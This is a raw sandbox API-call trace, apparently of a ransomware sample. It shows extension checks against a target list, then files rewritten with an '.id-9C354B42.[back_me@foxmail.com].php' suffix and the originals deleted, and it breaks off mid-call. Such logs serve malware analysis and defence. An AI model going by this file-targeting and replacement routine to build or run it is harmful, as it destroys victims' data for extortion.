[0048.786] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.786] lstrlenW (lpString=".xls") returned 4 [0048.786] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.787] lstrlenW (lpString=".xlsx") returned 5 [0048.787] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.787] lstrlenW (lpString=".ppt") returned 4 [0048.787] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.787] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0048.787] lstrlenW (lpString=".zip") returned 4 [0048.787] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.787] lstrlenW (lpString=".rar") returned 4 [0048.787] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.787] lstrlenW (lpString=".bz2") returned 4 [0048.787] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.787] lstrlenW (lpString=".7z") returned 3 [0048.787] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.787] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0048.787] lstrlenW (lpString=".dbf") returned 4 [0048.787] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.787] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0048.787] lstrlenW (lpString=".1cd") returned 4 [0048.787] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.787] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0048.787] lstrlenW (lpString=".jpg") returned 4 [0048.787] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.787] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0048.787] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0048.787] lstrlenW (lpString=".doc") returned 4 [0048.787] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.787] lstrlenW (lpString=".docx") returned 5 [0048.787] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.787] lstrlenW (lpString=".pdf") returned 4 [0048.787] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.787] lstrlenW (lpString=".xls") returned 4 [0048.787] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.787] lstrlenW (lpString=".xlsx") returned 5 [0048.788] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.788] lstrlenW (lpString=".ppt") returned 4 [0048.788] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.788] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0048.788] lstrlenW (lpString=".zip") returned 4 [0048.788] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.788] lstrlenW (lpString=".rar") returned 4 [0048.788] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.788] lstrlenW (lpString=".bz2") returned 4 [0048.788] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.788] lstrlenW (lpString=".7z") returned 3 [0048.788] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.788] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0048.788] lstrlenW (lpString=".dbf") returned 4 [0048.788] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.788] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0048.788] lstrlenW (lpString=".1cd") returned 4 [0048.788] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.788] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 73 [0048.788] lstrlenW (lpString=".jpg") returned 4 [0048.788] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.788] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0048.788] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0048.788] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0048.789] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=2527) returned 1 [0048.789] CloseHandle (hObject=0x200) returned 1 [0048.789] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif")) returned 0x20 [0048.789] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0048.789] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0048.789] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.789] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.789] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0048.791] GetLastError () returned 0x0 [0048.791] ReadFile (in: hFile=0x200, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x9df, lpOverlapped=0x0) returned 1 [0048.792] WriteFile (in: hFile=0x218, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x9e0, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x9e0, lpOverlapped=0x0) returned 1 [0048.793] ReadFile (in: hFile=0x200, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.793] WriteFile (in: hFile=0x218, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.793] SetEndOfFile (hFile=0x218) returned 1 [0048.793] CloseHandle (hObject=0x218) returned 1 [0048.794] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.794] SetEndOfFile (hFile=0x200) returned 1 [0048.794] CloseHandle (hObject=0x200) returned 1 [0048.794] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0048.795] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif")) returned 1 [0048.795] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.795] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.795] lstrlenW (lpString=".doc") returned 4 [0048.795] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.795] lstrlenW (lpString=".docx") returned 5 [0048.795] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.795] lstrlenW (lpString=".pdf") returned 4 [0048.795] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.795] lstrlenW (lpString=".xls") returned 4 [0048.795] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.795] lstrlenW (lpString=".xlsx") returned 5 [0048.795] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.795] lstrlenW (lpString=".ppt") returned 4 [0048.795] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.795] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.795] lstrlenW (lpString=".zip") returned 4 [0048.795] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.795] lstrlenW (lpString=".rar") returned 4 [0048.795] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.795] lstrlenW (lpString=".bz2") returned 4 [0048.795] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.795] lstrlenW (lpString=".7z") returned 3 [0048.795] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.795] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.796] lstrlenW (lpString=".dbf") returned 4 [0048.796] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.796] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.796] lstrlenW (lpString=".1cd") returned 4 [0048.796] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.796] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.796] lstrlenW (lpString=".jpg") returned 4 [0048.796] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.796] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.796] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.796] lstrlenW (lpString=".doc") returned 4 [0048.796] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.796] lstrlenW (lpString=".docx") returned 5 [0048.796] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.796] lstrlenW (lpString=".pdf") returned 4 [0048.796] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.796] lstrlenW (lpString=".xls") returned 4 [0048.796] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.796] lstrlenW (lpString=".xlsx") returned 5 [0048.796] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.796] lstrlenW (lpString=".ppt") returned 4 [0048.796] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.796] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.796] lstrlenW (lpString=".zip") returned 4 [0048.796] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.796] lstrlenW (lpString=".rar") returned 4 [0048.796] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.796] lstrlenW (lpString=".bz2") returned 4 [0048.796] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.796] lstrlenW (lpString=".7z") returned 3 [0048.796] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.796] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.796] lstrlenW (lpString=".dbf") returned 4 [0048.796] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.796] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.797] lstrlenW (lpString=".1cd") returned 4 [0048.797] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.797] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.797] lstrlenW (lpString=".jpg") returned 4 [0048.797] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.797] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0048.797] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0048.797] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0048.798] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=19525) returned 1 [0048.798] CloseHandle (hObject=0x200) returned 1 [0048.798] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png")) returned 0x20 [0048.798] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0048.798] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0048.798] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.798] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.798] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0048.799] GetLastError () returned 0x0 [0048.799] ReadFile (in: hFile=0x200, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x4c45, lpOverlapped=0x0) returned 1 [0048.800] WriteFile (in: hFile=0x218, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x4c50, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x4c50, lpOverlapped=0x0) returned 1 [0048.801] ReadFile (in: hFile=0x200, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.802] WriteFile (in: hFile=0x218, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xec, lpOverlapped=0x0) returned 1 [0048.802] SetEndOfFile (hFile=0x218) returned 1 [0048.802] CloseHandle (hObject=0x218) returned 1 [0048.802] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.802] SetEndOfFile (hFile=0x200) returned 1 [0048.803] CloseHandle (hObject=0x200) returned 1 [0048.803] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0048.803] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\thmbnail.png")) returned 1 [0048.803] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0048.803] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0048.803] lstrlenW (lpString=".doc") returned 4 [0048.803] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.803] lstrlenW (lpString=".docx") returned 5 [0048.803] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.803] lstrlenW (lpString=".pdf") returned 4 [0048.803] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.803] lstrlenW (lpString=".xls") returned 4 [0048.803] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.803] lstrlenW (lpString=".xlsx") returned 5 [0048.804] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.804] lstrlenW (lpString=".ppt") returned 4 [0048.804] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0048.804] lstrlenW (lpString=".zip") returned 4 [0048.804] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.804] lstrlenW (lpString=".rar") returned 4 [0048.804] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.804] lstrlenW (lpString=".bz2") returned 4 [0048.804] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.804] lstrlenW (lpString=".7z") returned 3 [0048.804] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0048.804] lstrlenW (lpString=".dbf") returned 4 [0048.804] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0048.804] lstrlenW (lpString=".1cd") returned 4 [0048.804] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0048.804] lstrlenW (lpString=".jpg") returned 4 [0048.804] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0048.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0048.804] lstrlenW (lpString=".doc") returned 4 [0048.804] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.804] lstrlenW (lpString=".docx") returned 5 [0048.804] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.804] lstrlenW (lpString=".pdf") returned 4 [0048.804] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.804] lstrlenW (lpString=".xls") returned 4 [0048.804] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.804] lstrlenW (lpString=".xlsx") returned 5 [0048.804] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.804] lstrlenW (lpString=".ppt") returned 4 [0048.804] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.805] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0048.805] lstrlenW (lpString=".zip") returned 4 [0048.805] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.805] lstrlenW (lpString=".rar") returned 4 [0048.805] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.805] lstrlenW (lpString=".bz2") returned 4 [0048.805] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.805] lstrlenW (lpString=".7z") returned 3 [0048.805] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.805] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0048.805] lstrlenW (lpString=".dbf") returned 4 [0048.805] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.805] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0048.805] lstrlenW (lpString=".1cd") returned 4 [0048.805] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.805] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\THMBNAIL.PNG") returned 75 [0048.805] lstrlenW (lpString=".jpg") returned 4 [0048.805] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.805] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0048.805] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0048.805] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0048.806] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=1737) returned 1 [0048.806] CloseHandle (hObject=0x200) returned 1 [0048.806] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif")) returned 0x20 [0048.806] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0048.806] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0048.806] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.806] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.806] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0048.808] GetLastError () returned 0x0 [0048.808] ReadFile (in: hFile=0x200, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x6c9, lpOverlapped=0x0) returned 1 [0048.810] WriteFile (in: hFile=0x218, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x6d0, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x6d0, lpOverlapped=0x0) returned 1 [0048.811] ReadFile (in: hFile=0x200, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.811] WriteFile (in: hFile=0x218, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.811] SetEndOfFile (hFile=0x218) returned 1 [0048.811] CloseHandle (hObject=0x218) returned 1 [0048.811] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.811] SetEndOfFile (hFile=0x200) returned 1 [0048.812] CloseHandle (hObject=0x200) returned 1 [0048.812] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0048.812] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif")) returned 1 [0048.812] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.812] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.813] lstrlenW (lpString=".doc") returned 4 [0048.813] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.813] lstrlenW (lpString=".docx") returned 5 [0048.813] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.813] lstrlenW (lpString=".pdf") returned 4 [0048.813] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.813] lstrlenW (lpString=".xls") returned 4 [0048.813] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.813] lstrlenW (lpString=".xlsx") returned 5 [0048.813] lstrcmpiW 